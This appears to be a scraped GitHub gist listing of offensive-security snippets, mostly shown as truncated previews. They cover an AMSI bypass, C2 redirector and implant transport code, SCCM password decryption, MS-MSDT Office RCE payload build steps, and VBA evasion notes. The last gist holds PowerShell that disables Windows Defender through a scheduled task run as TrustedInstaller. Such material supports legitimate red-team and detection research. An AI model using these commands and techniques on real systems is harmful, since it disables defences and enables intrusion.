$ tar -xvf vmName.ova$ vi vmName.ovf
mgeeky
/ AMSITools.psm1
Created
August 5, 2022 13:05
— forked from mgraeber-rc/AMSITools.psm1
Get-AMSIEvent and Send-AmsiContent are helper functions used to validate AMSI ETW events. Note: because this script contains the word AMSI, it will flag most AV engines. Add an exception on a test system accordingly in order to get this to work.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| filter Send-AmsiContent { | |
| <# | |
| .SYNOPSIS | |
| Supplies the AmsiScanBuffer function with a buffer to be scanned by an AMSI provider. | |
| Author: Matt Graeber | |
| Company: Red Canary | |
| .DESCRIPTION |
mgeeky
/ Caddyfile
Created
August 1, 2022 19:16
— forked from byt3bl33d3r/Caddyfile
Caddyfile reverse proxy example for C2 platforms
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| # This instructs Caddy to hit the LetsEncrypt staging endpoint, in production you should remove this. | |
| acme_ca https://acme-staging-v02.api.letsencrypt.org/directory | |
| } | |
| (proxy_upstream) { | |
| # Enable access logging to STDOUT | |
| log | |
| # This is our list of naughty client User Agents that we don't want accessing our C2 |
mgeeky
/ transport_https.c
Created
July 11, 2022 21:24
— forked from Cracked5pider/transport_https.c
perform HTTPs requests using WinHTTP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize ) | |
| { | |
| #ifdef TRANSPORT_HTTP | |
| HANDLE hConnect = NULL; | |
| HANDLE hSession = NULL; | |
| HANDLE hRequest = NULL; | |
| DWORD HttpFlags = 0; | |
| LPVOID RespBuffer = NULL; |
mgeeky
/ howToModifyOvaFile.md
Created
July 5, 2022 21:00
— forked from afdevries/howToModifyOvaFile.md
how to modify .ova file on linux/Mac using terminal....export vm (OVF 1.0) from virtualbox, then modify some tag and hash value for import vm to ESXi
mgeeky
/ sccmdecryptpoc.cs
Created
July 3, 2022 20:01
— forked from xpn/sccmdecryptpoc.cs
SCCM Account Password Decryption POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;) | |
| // Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work. | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| namespace SCCMDecryptPOC | |
| { | |
| internal class Program |
mgeeky
/ TlsCallback.cpp
Created
June 14, 2022 18:58
TLS Callbacks demo in Windows GUI application, to be compiled with MSVC++. Originally authored by Elias Bachaalany, source: http://lallouslab.net/2017/05/30/using-cc-tls-callbacks-in-visual-studio-with-your-32-or-64bits-programs/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define WIN32_LEAN_AND_MEAN | |
| #include <iostream> | |
| #include <windows.h> | |
| VOID WINAPI TlsCallback1(PVOID DllHandle, DWORD Reason, PVOID Reserved) | |
| { | |
| if (Reason == DLL_PROCESS_ATTACH) | |
| { | |
| MessageBoxA(NULL, "Hello from TlsCallback1", "TlsCallback1", 0); |
mgeeky
/ ms-msdt.MD
Created
May 31, 2022 07:46
— forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:
- Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
This PoC is currently not working properly.
The PoC demonstrates how to dynamically call WinAPI imported functions from VBA using oleaut32!DispCallFunc(...).
The idea is to get rid of most of the Private Declare PtrSafe Function SomeFunction Lib "kernel32.dll" Alias "Sleep" ( ... ) statements, revealing intent of a dodgy VBA code.
From the offensive perspective we'd prefer to have the least amount of WinAPI import statements in our VBA to lower detection rate on the security aware scanners.
mgeeky
/ patchless_amsi.h
Created
May 12, 2022 16:47
— forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #ifndef PATCHLESS_AMSI_H | |
| #define PATCHLESS_AMSI_H | |
| #include <windows.h> | |
| static const int AMSI_RESULT_CLEAN = 0; | |
| PVOID g_amsiScanBufferPtr = nullptr; | |
| unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
| $a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
| Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
| $svc = New-Object -ComObject 'Schedule.Service' | |
| $svc.Connect() | |
| $user = 'NT SERVICE\TrustedInstaller' | |
| $folder = $svc.GetFolder('\') |